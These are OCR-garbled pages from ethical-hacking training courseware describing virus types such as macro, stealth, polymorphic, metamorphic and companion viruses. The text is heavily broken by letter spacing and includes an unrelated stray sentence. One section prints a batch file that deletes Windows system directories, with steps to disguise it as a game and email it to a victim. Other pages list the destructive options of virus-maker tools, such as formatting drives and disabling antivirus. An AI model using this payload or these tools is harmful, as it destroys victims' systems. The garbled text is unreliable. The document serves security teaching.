t i t e v ir u s is also k n o w n as a m u l t i - p a r t v i r u s t h a t a t t e m p t s t o a t t a c k b o t h t h e b o o t s e c t o r a n d t h e e x e c u ta b le o r p r o g r a m file s a t t h e s a m e t i m e . W h e n r g w v ir u s is a t t a c h e d t o t h e b o o t s e c to r , it w i ll in t u r n a f f e c t t h e s y s te m file s , a n d t h e n t h e v ir u s a tta c h e s t o t h e file s, a n d t h is t i m e it w ill in t u r n i n f e c t t h e b o o t s e c to r .
M o d u le 0 7 P ag e 1041
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
M a c ro V iru ses
0 11.
Infects M acro Enabled D o cu m en ts
Urt1fw4
CEH
ilh iu l lUtbM
A tta c k e r
U ser
0 r 0 M o s t m a c ro viruses are w r itte n using m a c ro lang uag e V isual Basic fo r A p p lic a tio n s (VBA)
M a c r o
V ir u s e s
M i c r o s o f t W o r d o r s i m i l a r a p p li c a t i o n s can be i n f e c t e d t h r o u g h a c o m p u t e r v i r u s c a lle d m a c r o v iru s , w h i c h a u t o m a t i c a l l y p e r f o r m s a s e q u e n c e o f a c tio n s w h e n t h e a p p li c a t i o n is t r i g g e r e d o r s o m e t h i n g else. M o s t m a c r o v iru s e s a re w r i t t e n u s in g t h e m a c r o la n g u a g e V is u a l Basic f o r A p p l i c a t i o n s (V B A ) a n d t h e y i n f e c t t e m p l a t e s o r c o n v e r t i n f e c t e d d o c u m e n t s i n t o t e m p l a t e file s, w h i l e m a i n t a i n in g t h e i r a p p e a r a n c e o f o r d i n a r y d o c u m e n t file s. M a c r o v ir u s e s a re s o m e w h a t less h a r m f u l t h a n o t h e r ty p e s . T h e y a re u s u a lly s p re a d via an e m a il. P ure d a ta file s d o n o t a l l o w t h e s p re a d o f v iru s e s , b u t s o m e t i m e s t h e lin e b e t w e e n a d a ta f ile a n d an e x e c u t a b l e f i l e is e a sily o v e r l o o k e d by t h e a v e r a g e u se r d u e t o t h e e x te n s iv e m a c r o la n g u a g e s in s o m e p r o g r a m s . In m o s t cases, j u s t t o m a k e t h in g s easy f o r users, t h e lin e b e t w e e n a d a ta file a n d a p r o g r a m s ta r t s t o b lu r o n l y in cases w h e r e t h e d e f a u l t m a c r o s a re s e t t o ru n a u t o m a t i c a l l y e v e r y t i m e t h e d a ta file is lo a d e d . V ir u s w r i t e r s can e x p l o i t c o m m o n p r o g r a m s w i t h m a c r o c a p a b i l it y such as M i c r o s o f t W o r d , Excel, a n d o t h e r O ffic e p r o g r a m s . W i n d o w s H e lp file s can also c o n t a i n m a c r o c o d e . In a d d it io n , t h e la t e s t e x p l o i t e d m a c r o c o d e e xists in t h e fu ll v e r s io n o f t h e A c r o b a t p r o g r a m t h a t re a d s a n d w r i t e s PDF files.
M o d u le 0 7 P ag e 1042
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
User
M o d u le 0 7 P ag e 1043
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
C lu s te r V iru ses
C lu s te r V iru s e s
a
CEH
: I : * ]
V iru s
C o p y
L a u n c h
Its e lf
C lu s te r V ir u s e s C lu s te r v iru s e s in f e c t file s w i t h o u t c h a n g in g t h e file o r p la n t in g e x tr a file s t h e y c h a n g e t h e DOS d i r e c t o r y i n f o r m a t i o n so t h a t e n t r i e s p o i n t t o t h e v ir u s c o d e in s te a d o f t h e a c tu a l p r o g r a m . W h e n a p r o g r a m r u n s DOS, it f i r s t lo a d s a n d e x e c u te s t h e v iru s c o d e , a n d t h e n t h e v ir u s lo c a te s t h e a c tu a l p r o g r a m a n d e x e c u te s it. D ir-2 is an e x a m p le o f t h is t y p e o f v iru s . C lu s te r v iru s e s m o d i f y d i r e c t o r y t a b l e e n t r i e s so t h a t d i r e c t o r y e n t r i e s p o i n t t o t h e v ir u s c o d e . T h e r e is o n l y o n e c o p y o f t h e v ir u s o n t h e d is k i n f e c t i n g all t h e p r o g r a m s in t h e c o m p u t e r s y s te m . It w i ll la u n c h i t s e lf f i r s t w h e n a n y p r o g r a m o n t h e c o m p u t e r s y s te m is s t a r t e d a n d t h e n t h e c o n t r o l is p assed t o t h e a c tu a l p r o g r a m .
M o d u le 0 7 P ag e 1044
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
Stealth/Tunneling Viruses
T h e s e v iru s e s e v a d e t h e a n ti- v ir u s s o ft w a r e b y in te r c e p t in g its re q u e s ts t o th e o p e r a t in g s y s te m A v iru s can h id e it s e lf b y in te r c e p t in g th e a n ti- v ir u s s o ftw a r e 's r e q u e s t to re a d th e file a n d p a s s in g th e r e q u e s t to th e v iru s , in s te a d o f th e OS T h e v iru s c an th e n r e t u r n a n u n in fe c te d v e r s io n o f t h e file to th e a n tiv iru s s o ft w a r e , s o th a t it a p p e a r s as i f th e file is " c le a n "
CEH
if
S te a lth /T u n n e lin g
V ir u s e s
c o r r u p t i n g t h e c h o s e n s e rv ic e call i n t e r r u p t s w h e n t h e y a re b e in g ru n . R e q u e s ts t o p e r f o r m o p e r a t i o n s in r e s p e c t t o th e s e se rv ic e call i n t e r r u p t s a re r e p la c e d by v iru s c o d e . T h e se v iru s e s s ta te fa lse i n f o r m a t i o n t o h id e t h e i r p r e s e n c e f r o m a n t i v i r u s p r o g r a m s . For e x a m p le , t h e s t e a l t h v i r u s h id e s t h e o p e r a t i o n s t h a t it m o d i f i e d a n d g ive s fa ls e r e p r e s e n t a t i o n s . T hu s, it ta k e s o v e r p o r t i o n s o f t h e t a r g e t s y s te m a nd h id e s its v ir u s co d e . T h e s t e a lt h v iru s h id e s it s e lf f r o m a n t i v i r u s s o f t w a r e by h id in g t h e o rig in a l size o f t h e file o r t e m p o r a r i l y p la c in g a c o p y o f it s e lf in s o m e o t h e r d r iv e o f t h e s y s te m , t h u s r e p la c in g t h e i n f e c t e d file w i t h t h e u n i n f e c t e d file t h a t is s t o r e d o n t h e h a r d d riv e . A s t e a lt h v ir u s h id e s t h e m o d if ic a t i o n s t h a t it m a k e s . It ta k e s c o n t r o l o f t h e s y s te m 's f u n c t io n s t h a t re a d file s o r s y s te m s e c to r s a n d , w h e n a n o t h e r p r o g r a m r e q u e s ts i n f o r m a t i o n t h a t has a lr e a d y b e e n m o d i f i e d by t h e v iru s , t h e s t e a l t h v i r u s r e p o r t s t h a t i n f o r m a t i o n t o t h e r e q u e s t i n g p r o g r a m in s te a d . T his v ir u s a lso re s id e s in t h e m e m o r y . T o a v o id d e t e c t i o n , th e s e v iru s e s a lw a y s t a k e o v e r s y s te m f u n c t i o n s a n d use t h e m t o h id e t h e i r p re s e n c e .
M o d u le 0 7 P ag e 1045
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
O n e o f t h e c a rr ie r s o f t h e s t e a lth v ir u s is t h e r o o t k i t . In s ta llin g a r o o t k i t g e n e r a l l y r e s u lts in t h is v ir u s a t t a c k b e c a u s e r o o t k i t s a re in s t a lle d via T ro ja n s , a n d t h u s a re c a p a b le o f h id in g a n y m a lw a re . R e m o v a l: Q e / T u n n e lin g V ir u s e s T h e s e v iru s e s t r a c e t h e s te p s o f i n t e r c e p t o r p r o g r a m s t h a t m o n i t o r o p e r a t i n g s y s t e m r e q u e s ts so t h a t t h e y g e t i n t o BIOS a n d DOS t o in s ta ll th e m s e lv e s . To p e r f o r m th is a c tiv it y , t h e y even tu n n e l u n d e r a n tiv iru s s o ftw a re p ro g ra m s.
G iv e m e t h e s y s t e m file tc p ip .s y i t o ic o n
VIRUS
Here you go
O rig in a l TCPIP.SYS
M o d u le 0 7 P ag e 1046
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
E th ic a l H a c k in g a n d C o u n t e r m e a s u r e s
E x a m 3 1 2 - 5 0 C e r t if ie d E th ic a l H a c k e r
V iru ses a n d W o rm s
T his ty p e o f v iru s u s e s s im p le e n c r y p t io n t o e n c ip h e r t h e c o d e
CEH
V iru s C o d e
r
T h e v iru s is e n c r y p t e d w ith a d iffe re n t key fo r ea ch in f e c te d file AV s c a n n e r c a n n o t d ire c tly d e t e c t t h e s e ty p e s o f v ir u s e s u s in g s ig n a t u r e d e te c tio n m e th o d s
V.
-/
C o p y rig h t b y E & C a u a c tl. A ll R ig h ts R e se rve d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .
E n c r y p tio n
V ir u s e s
T his t y p e o f v ir u s co n s is ts o f an e n c r y p t e d c o p y o f t h e v iru s a nd a d e c r y p t i o n m o d u l e . T h e d e c r y p t i n g m o d u l e r e m a in s c o n s t a n t , w h e r e a s t h e d i f f e r e n t keys a re u sed f o r e n c r y p t i o n . T h e s e v iru s e s g e n e r a l l y e m p l o y XO R o n e a ch b y te w i t h a r a n d o m i z e d key. T h e v ir u s is e n c i p h e r e d w i t h an e n c r y p t i o n k e y t h a t co n s is ts o f a d e c r y p t i o n m o d u l e a nd an e n c r y p t e d c o p y o f t h e c o d e . Q For e a ch i n f e c t e d file , t h e v ir u s is e n c r y p t e d b y u sin g a d i f f e r e n t c o m b i n a t i o n o f keys, b u t t h e d e c r y p t i n g m o d u l e p a r t r e m a in s u n c h a n g e d . It is n o t p o s s ib le f o r t h e v ir u s s c a n n e r t o d ir e c t ly d e te c t th e v ir u s by m e a n s o f
s ig n a t u r e s , b u t t h e d e c r y p t i n g m o d u l e ca n be d e t e c t e d . e T h e d e c r y p t i o n t e c h n i q u e e m p lo y e d is x o r e a ch b y te w i t h a r a n d o m i z e d ke y t h a t is g e n e r a t e d a n d sa ved b y t h e r o o t v iru s .
M o d u le 0 7
Page 1047
Ethical H acking a n d C o u n te rm e a s u re s
C o p y r ig h t
by
EC-C0UnCil
A l l R i g h t s R e s e r v e d . R e p r o d u c t i o n is S t r i c t l y P r o h i b i t e d .
Virus Code
E n c ry p tio n V ir u s 1
E n c ry p tio n V ir u s 2
E n c r y p tio n V ir u s B
M o d u le 0 7 P ag e 1048
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
P o ly m o rp h ic Code
J J P o ly m o r p h ic c o d e is a c o d e t h a t m u ta te s w h ile k e e p in g th e o r ig in a l a lg o r ith m in ta c t To e n a b le p o ly m o r p h ic c o d e , th e v iru s h a s to h a v e a p o ly m o r p h ic e n g in e (a ls o c a lle d m u ta tin g e n g in e o r m u ta tio n e n g in e J A w e ll- w r it t e n p o ly m o r p h ic v iru s th e r e f o r e h a s n o p a r ts t h a t s ta y t h e s a m e o n e a ch in fe c tio n
CEH
39Encrypted Mutation Engine Encrypted Virus Code Decryptor Routine ........... Decryptor routine decrypts virus code and mutation engine
N e w P o ly m o r p h ic V iru s
U ser Runs an In f e c t e d P r o g r a m
RAM
P o ly m o r p h ic
C o d e
P o l y m o r p h ic v iru s e s m o d i f y t h e i r c o d e f o r e a ch r e p li c a t i o n in o r d e r t o a v o i d d e t e c t i o n . T h e y a c c o m p lis h t h is b y c h a n g in g t h e e n c r y p t i o n m o d u l e a nd t h e i n s t r u c t i o n s e q u e n c e . A r a n d o m n u m b e r g e n e r a t o r is used f o r i m p l e m e n t i n g p o l y m o r p h i s m . A m u t a t i o n e n g in e is g e n e r a l l y used t o e n a b le p o l y m o r p h i c c o d e . T h e m u t a t o r p r o v id e s a s e q u e n c e o f i n s t r u c t i o n s t h a t a v i r u s s c a n n e r can use t o o p t i m i z e an a p p r o p r i a t e d e t e c t i o n a lg o r i t h m . S lo w p o l y m o r p h i c c o d e s a re u sed t o p r e v e n t a n t i v i r u s p r o f e s s i o n a l s f r o m accessing th e codes. V ir u s s a m p le s , w h i c h a re b a it file s a f t e r a s ing le e x e c u t i o n is i n f e c t e d , c o n t a i n a s i m i l a r c o p y o f t h e viru s . A s im p le i n t e g r i t y c h e c k e r is used t o d e t e c t t h e p r e s e n c e o f a p o l y m o r p h i c v iru s in th e s y s te m 's disk.
M o d u le 0 7 P ag e 1049
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
E n c ry p te d M u ta tio n E n g in e (EM E) j
Instruct
A to 0
A In s tr u c t t o
i I
Decryptor Routine
*
U ser R uns an In f e c te d P ro g r a m
V ir u s D o e s t h e D a m a g e
RAM
FIGURE 7 .1 1 : H o w P o ly m o rp h ic C ode W o rk
P o l y m o r p h ic v iru s e s c o n s is t o f t h r e e c o m p o n e n t s . T h e y a re t h e e n c r y p t e d v i r u s c o d e , t h e d e c r y p t o r r o u t i n e , a n d t h e m u t a t i o n e n g in e . T h e f u n c t i o n o f t h e d e c r y p t o r r o u t i n e is t o d e c r y p t t h e v ir u s c o d e . It d e c r y p t s t h e c o d e o n l y a f t e r t a k i n g c o n t r o l o v e r t h e c o m p u t e r . T h e m u t a t i o n e n g in e g e n e r a t e s r a n d o m i z e d d e c r y p t i o n r o u t in e s . T his d e c r y p t i o n r o u t i n e s v a rie s e v e r y t i m e w h e n a n e w p r o g r a m is i n f e c t e d by t h e viru s . W i t h a p o l y m o r p h i c v iru s , b o t h t h e m u t a t i o n e n g in e a n d t h e v ir u s c o d e a re e n c r y p t e d . W h e n a p r o g r a m t h a t is i n f e c t e d w i t h a p o l y m o r p h i c v ir u s is ru n b y t h e user, t h e d e c r y p t o r r o u t i n e ta k e s c o m p l e t e c o n t r o l o v e r t h e s y s te m , a f t e r w h i c h it d e c r y p t s t h e v iru s c o d e a n d t h e m u t a t i o n e n g in e . N e x t, t h e c o n t r o l o f y o u r s y s te m is t r a n s f e r r e d by t h e d e c r y p t i o n r o u t i n e t o t h e v iru s , w h i c h lo c a te s a n e w p r o g r a m t o in f e c t. In R A M ( R a n d o m Access M e m o r y ) , t h e v ir u s m a k e s a r e p lic a o f it s e lf as w e l l as t h e m u t a t i o n e n g in e . T h e n t h e v ir u s in s t r u c t s t h e e n c r y p t e d m u t a t i o n e n g in e to g en erate a new ra n d o m iz e d d e c ry p tio n ro u tin e , w h ic h has t h e c a p a b i l it y of
M o d u le 0 7 P ag e 1050
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
M e ta m o rp h ic V iru s e s
M e ta m o rp h ic V iru s e s M e ta m o rp h ic C ode
CEH
U r t i f f e t f i t k N j I l U i l w t
M e ta m o rp h ic code can re p ro g ra m its e lf by tra n s la tin g its o w n code in to a te m p o ra ry re p re s e n ta tio n and th e n back to th e n o rm a l code again
E3
E l
a.) V ariant A c.) The "Unofficial Variant C
a tI A H M JI Lb Y i H f ca t N t a lc t t l l l l e r / ^ J A mEtAPHGR 1b BY 1H A1LER/2*\ rTAfSC iCbVlHE nW4l dFIIUi/2^
E l
b.) Variant B
[1E
d.) The .D variant (which was the *official' C of the original author)
M e ta m o r p h ic
V ir u s e s
S o m e v iru s e s r e w r i t e t h e m s e l v e s t o in f e c t n e w l y e x e c u te d files. Such v iru s e s are c o m p le x a n d use m e t a m o r p h i c e n g in e s f o r e x e c u t io n . A c o d e t h a t can r e p r o g r a m it s e lf is c a lle d m e t a m o r p h i c c o d e . T his c o d e is t r a n s l a t e d i n t o t h e t e m p o r a r y c o d e , a n d t h e n c o n v e r t e d b a ck t o t h e n o r m a l c o d e . This t e c h n i q u e , in w h i c h t h e o rig in a l a l g o r i t h m r e m a in s in t a c t , is used t o a v o id p a t t e r n r e c o g n i t i o n o f a n t i v i r u s s o f t w a r e . This is m o r e e f f e c t i v e in c o m p a r i s o n t o p o l y m o r p h i c c o d e . T his t y p e o f v ir u s c o n s is ts o f c o m p le x e x te n s iv e c o d e . T h e c o m m o n l y k n o w n m e t a m o r p h i c v iru s e s a re : W in 3 2 /S im ile : T his v ir u s is w r i t t e n in a s s e m b ly la n g u a g e a n d d e s t i n e d f o r M i c r o s o f t W i n d o w s . T his p ro c e s s is c o m p le x , a n d n e a r ly 9 0 % o f v i r u s c o d e s a re g e n e r a t e d b y t h is pro cess. Z m is t : Z m is t is also k n o w n as t h e Z o m b ie . M is t f a l l is t h e f i r s t v i r u s t o use t h e t e c h n i q u e c a lle d " c o d e i n t e g r a t i o n . " T his c o d e in s e rts i t s e lf i n t o o t h e r c o d e , r e g e n e r a t e s t h e c o d e , a n d r e b u ild s t h e e x e c u ta b le .
M o d u le 0 7 P ag e 1051
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
a.) Variant A
.....ok... d.) The .D variant (which was the "official" C of the original author)
FIGURE 7.12: Metamorphic Viruses Screenshot
b.) Variant B
Ethical Hacking and Countermeasures Copyright by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
C E H
Cavity Virus overwrites a part of the host file with a constant (usually nulls), without increasingthe length of the file and preserving its functionality
Sales and marketing management is the leading authority for executives in the sales and marketing management industries The suspect, Desmond Turner, surrendered to authorities at a downtown Indianapolis fast-food restaurant
O rig in a l File S ize: 4 5 KB
In fe c te d File
>
Copyright
Size: 4 5 KB
23a
..................................................................................... ^
h
L PDF
>1
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
S p a r s e
I n f e c t o r V
i r u s e s
M i r
S p a r s e I n f e c t o r V iru s J Sparse infector virus infects only occasionally (e.g. every tenth program executed), or only files whose lengths fall within a narrow range D iffic u lt t o D e t e c t J By infecting less often, such viruses try to minimize the probability of being discovered In fe c tio n P r o c e s s
S p a rse In fe c to r V iru se s
Sparse infector viruses infect only occasionally (e.g., every tenth program executed or on particular day of the week) or only files whose lengths fall within a n a rro w range. By infecting less often, these viruses try to m in im ize the probability of being discovered.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C o m p a n io n /C a m o u f la g e V iru s e s
C E H
A Companion virus creates a companion file for each executable file the virus infects
A
Therefore, a companion virus may save itself as notepad.com and every time a user executes notepad.exe (good program), the computer will load notepad.com (virus) and infect the system
1
Notepad.exe
...
1 /
Notepad.com
Attacker
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Virus infects th e system w ith a file note p a d .co m and saves It In c :\w ln n t\s y s te m 3 2 directory
V
Notepad.exe Notepad.com
Attacker
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
S h e l l V
i r u s e s
c d IthM (citifw Jl lU c k M
E H
J J
Virus code forms a shell around th e target host program 's code, making itself th e original program and host code as its sub-routine Almost all boot program viruses are shell viruses
[4U1
B e fo re I n fe c tio n
Original Program
A fte r I n fe c tio n
Original Program
Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
Ilf
S h e ll V iru s e s
A shell virus code form s a layer around the target host program's code that can be
com pared to an "egg shell/' making itself the original program and the host code its subroutine. Here, the original code is moved to a new location by the virus code and the virus assumes its identity.
B e fo re In fe c tio n
Original Program
A fte r I n fe c tio n
Virus Code
Original Program
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
F i l e
E x t e n s i o n
i r u s e s
C E H
Folder Options
F ile E x te n s io n V ir u s e s
General Search
You can apply the view (such as Detais or Icons) that you are us*1g for this folder to al folders of this type Apply to Folders
File extension viruses change the extensions of files .TXT is safe as it indicates a pure text file With extensions turned off, if someone sends you a file named BAD.TXT.VBS, you will only see BAD.TXT If you have forgotten that extensions are turned off, you might think this is a text file and open it
Folder views
Advanced settings:
J This is an executable Visual Basic Script virus file and could do serious damage J Countermeasure is to turn o ff "Hide file extensions" in Windows
Fies and Folders Always show icons, never thumbnails I I Always show menus @ Display Me icon on thumbnails 0 Display He size nfoimation m folder tps Display the full path in the Mle bar Jl Hdden Mes and folders O Dont show hidden files, folders, or dnves () Show hidden files, folders, and dnves y Hide emgty dnves in the Computer folder V. Ude folder merge conflicts
Restore QfifoJls
* P P * y
u
Q Q Q
F ile E x te n s io n V iru s e s
Source: h ttp://w w w .cknow .com /vtutor/FileExtensions.htm l File extension viruses change the extensions of files .TXT is safe as it indicates a pure text file W ith extensions are turned off, if som eone sends you a file named BAD.TXT.VBS, you can only see BAD.TXT If you have forgotten that the extensions are actually turned off, you might think this is a text file and open it
This is an executable Visual Basic Script virus file that could do serious damage
The counterm easure is to turn off "H ide file extension s" in W indows, as shown in the following screenshot:
Folder Options
ie w S G en eral V earch F o ld e rv iew s Y o ucanap p lythev iew(su chas D etateo rIco n s)that y o uareusngforth isfo ld ertoal fo ld erso fthstype. A p p lytoF o ld e rs R eset F o ld ers A d v an cedsettngs filesandF o ld ers H IA lw a y ssh o wico n s, neverth u m b n afc ( )A lw a y ssh o wm en u s @D isp la yW eico no nthum bnais @D isp la yW esize* fo rm atio nnfo ld ertps D isp la ythehi pathntheM lebar ii H id d enW e sandfo ld ers OD o n sh o whddenW e s.fo ld ers, o rd rrv es () S h o whrfdenW e s.fo ld ers, andd n v es Vh fc d eem p tyd n vesntheC o m p u terfo ld er ttde ex ten sio n s fo r k n o w n W e types y. U defo ld erm erg ecorftcts
J c a orc faults
O K
C an cel
pp*y
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
o n a n d I n t r u s i v e V i r u s e s E H
c d IUm (crtifw jI N M h M
A dd-O n V iru s e s
Add-on viruses append theircode to the host code without making any changes to the latter or relocate the host code to insert their own code at the beginning
Original Program Original Program Original Program
J.V M R ..
I I I I I I I I I I I I I I I I I I I I
viral code
Original Program
V iru s e s
Original Program
1 1 ^
. . .........................................................................JU M P.
FIGURE 7.18: Working of Add-on Viruses
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
In tru s iv e V iru se s
Intrusive viruses overw rite their code either by com pletely removing the target host's program code or som etim es overwriting only part of it. Therefore, the original code is not executed properly.
Original Program
Original Program
FIGURE 7.19: Working of Intrusive Viruses
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
T ra n s ie n t a n d T e r m in a te a n d S ta y R e s id e n t V ir u s e s E H
A
Direct Action or Transient Virus J
B a s ic I n f e c t i o n T e c h n i q u e s
th e m e m o ry during ff
^___
the entire work session even after the target host's program is executed and terminated; can be removed only by
T r a n s ie n t a n d T e r m in a te a n d S ta y R e s id e n t V ir u s e s T ra n s ie n t V iru se s
Transient viruses transfer all control to the host code w here they reside, select the target program to be m odified, and corrupt it.
T e r m i n a t e a n d S ta y R e s i d e n t V i r u s (T S R )
TSR viruses remain perm anently in m em ory during the entire w ork session, even after the target host program is executed and term in a ted . They can be removed only by rebooting the system.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
W ritin g
S im p le V iru s P r o g r a m
C E H
Send the Game.com file as an email attachment to a victim Create a batch file Game.bat with this text
0 echo o f f d e l c:\w in n t\syste m 3 2 \ * .* d e l c : \ w in n t\ * .*
When run it deletes core files in the WINNTdirectory making Windows unusable ,
W ritin g a S im p le V iru s P r o g r a m
----For d e m o n s tra tio n purposes, a simple program that can be used to cause harm to a target system is shown here: 1. Create a batch file G am e.bat with the following text: text @echo off delete c:\winnt\system32\*.* delete c:\winnt\*.* 2. 3. 4. 5. Convert the Gam e.bat batch file to Gam e.com using the bat2com utility Assign Icon to Gam e.com using W in d o w s file properties screen Send the Gam e.com file as an email attachm ent to a victim W hen the victim runs this program, it deletes core files in the \W IN N T directory, making W in d o w s unusable The victim w ould have to reinstall W in d o w s , causing problem s to already saved files.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
T e r a b i t V i r u s
a k e r
. I !
^ H ^ i d Opening Copy,Move Window f l A v o i d Opening Gpedit f l Avoid Opening Media Player f l Avoid Opening Mozilla Firefox f l Avoid Opening MsConfig Avoid Opening Notepad ^ f l Avoid Opening Wordpad f l Avoid Opening Yahoo M essen ger f l Add 30 User Accounts to Windows f l Always Clean Clipboard f l Always Log Off f l Delete All Files In Desktop f l Delete All Files In My Documents * f l Delete W indows Font f l Delete W indows Screen Savers f l Disconnect From Internet f l Disable Automatic Updates f l Disable Com m and Prompt f l Disable Printer f l Disable Regedit f l Disable Screen Saver f l Disable System Restore f l Disable Task Manager f l Disable W indows Firewall f l Disable W indows Installer
f l Disable W indows Security Essentials f l Format All Hard Drives f l Funny Keyboard f l Funny Mouse f l Funny Start Button M Gradually Fill System Volum e f l Hide Desktop Icons f l Hide Taskbar f l Lock All D riv e s /o ld e rs f l M ute System Volum e f l Open/Close CD-ROM Every 10 Sec f l Play Beep Sound Every Sec f l Remove Desktop Wallpaper f l Remove Run From Start Menu f l Remove Start Button f l Remove W indows Clock f l Slow Down PC Speed f l Spread w ith Floppy , Folders f l Stop SQL Server f l Swap M ouse Buttons f l Transparent Explorer Windows f l Turn off Com puter A fter 5 Mm f l Turn Off M onitor
f l Close Internet Explorer Every 10 Sec f l Lock Internet Explorer Option Menu
fl Q I29p|G/,V U qO M Z1 -IL G M 9
lnLU COUJbCopyright by E (
T e ra B IT V iru s M a k e r
TeraBIT Virus M a k e r is a virus that is mostly detected by all antivirus softw a re w hen scanned. This virus mostly d o e sn 't harm the PC, but it can disable the antivirus that is installed on the system for a short time.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Avoid Opening Calculator M Avoid Opening Copy,Move Window H Avoid Opening Gpedit H Avoid Opening Media Player M Avoid Opening Mozilla Firefox M Avoid Opening MsConfig Avoid Opening Notepad H Avoid Opening Wordpad ^ Avoid Opening Yahoo Messenger M Add JO User Accounts to Windows M Always Clean Clipboard M Always Log Off | Close Internet Explorer Every 10 Sec M Delete All Files In Desktop M Delete All Files In My Documents Delete Windows Fonts 0 Delete Windows Screen Savers M Disconnect From Internet ^ Disable Automatic Updates B Disable Command Prompt | Disable Printer M Disable Regedit 0 Disable Screen Saver H Disable System Restore Q Disable Task Manager M Disable Windows Firewall Disable Windows Installer
H | Jf jf l H Jf ^
ft
J M ^ M
M | M
'/I
^ H f
Cl
jfl | 0 |
Disable Windows Security Center Disable Windows Security Essentials Disable Windows Themes Format All Hard Drives Funny Keyboard Funny Mouse Funny Start Button Gradually Fill System Volume Hide Desktop Icons Hide Folder Option Menu Hide Taskbar Lock All Drives,Folders Lock Internet Explorer Option Menu Mute System Volume Open/Close CD-ROM Every 10 Sec Play Beep Sound Every Sec Remove Desktop Wallpaper Remove Run From Start Menu Remove Start Button Remove Windows Clock Slow Down PC Speed Spread with Floppy, Folders S>P SQL Server Swap Mouse Buttons Transparent Explorer Windows Turn off Computer After 5 Min Turn Off Monitor
R u n C u s to m C o m m a n d
Fie Name
exe B
Create V irus
About E
xt
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
JP S V iru s M a k e r a n d B a tc h V iru s M a k e r
D E L m E 's
IPS ( Virus M aker 3.0 ) nfectoo ? < 0* | OVier Opbora Mtcelcnecus @ectofl Spam Local Dak PbyWnXPSono Net Send Spam |
\
Change User Psnod| Open1 304c Dak T1a | SpaaParter |
[Met Ail Xml Ffat | Delete M .Mp3 F* CeMe Al Phg File* | The La* Restart 1 Delete M bee Fie* DeMetWdl Delete M y Munc
Delete My Documents 1
DcMeMyPcaun |
ft*, Frtocaion To D*** Mg M) |dl 1 Dal ! | \vd Delete | |*-l CMet* | | "fl OaWe Notepad D M tP m | | Delete E m* Defcto lfj< plow Delate | [Mate | Delate | Dalai Wo-d DaMe Outtoax 0**eSrf | \ |
0 FV to< O LooO ff
Vr*5 A'lrr Ir^HI I
0 TurnO ff
OH ibiinofco
0 N oe
Server Name.
wfiggyfeoy com
w & co m |
9 0 0
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Disable fie^stry Disable MsCortig Disable Tat* Manager Disable Yahoo Disable Meda Pa^er Disable Internet Explore! Disable Tme Disable Gkx >Pokey Disable Wndows Explore* Disable Norton Anb Vius Disable McAfee Anb Vius Disable Note Pad Disable W ad Pad Disable Wndows Disable DHCP dent Disable Taskbai Disable Start Button Disable MSN Messengei Disable CMD Disable Secirty Center Disable System Restore Disable Control Panel Disable Desktop Icons Disable Saeen Save* O Log OH
R u n d i3 ;
H rie S ervK et
Q O
Hide Outlook Expreu HJe Wndows Clock Hide Desktop Icon* HideAIPioccess n Taskmgi Hide A l Tasks n Taskmgi Hide Rm Change Explorer Caption Cleat Wndows XP Swap Mouse Batons Remove Foldet Options Lock Mouse & Keyboard Mute Sound Always CDflOM TunOKMontoi Ctajy Mouse Destroy askbat Destroy OINnes (VMessengetl Destroy Protected Stiotage Destroy Audo Service Destroy Clpboatd TemwMte Wndows Hide Cutot Auto Startup O Htmnate O None
O Restart
O Tun OH
JPS V t n u M a k e r 3 0
D E L m E 's B a t c h V ir u s M a k e r (/A
1 DELmE's Batch Virus M a k e r is a simple tool that allows you to create your own choice
^LJxj O a n g U a a rP m * w o r dT o q w o r ty
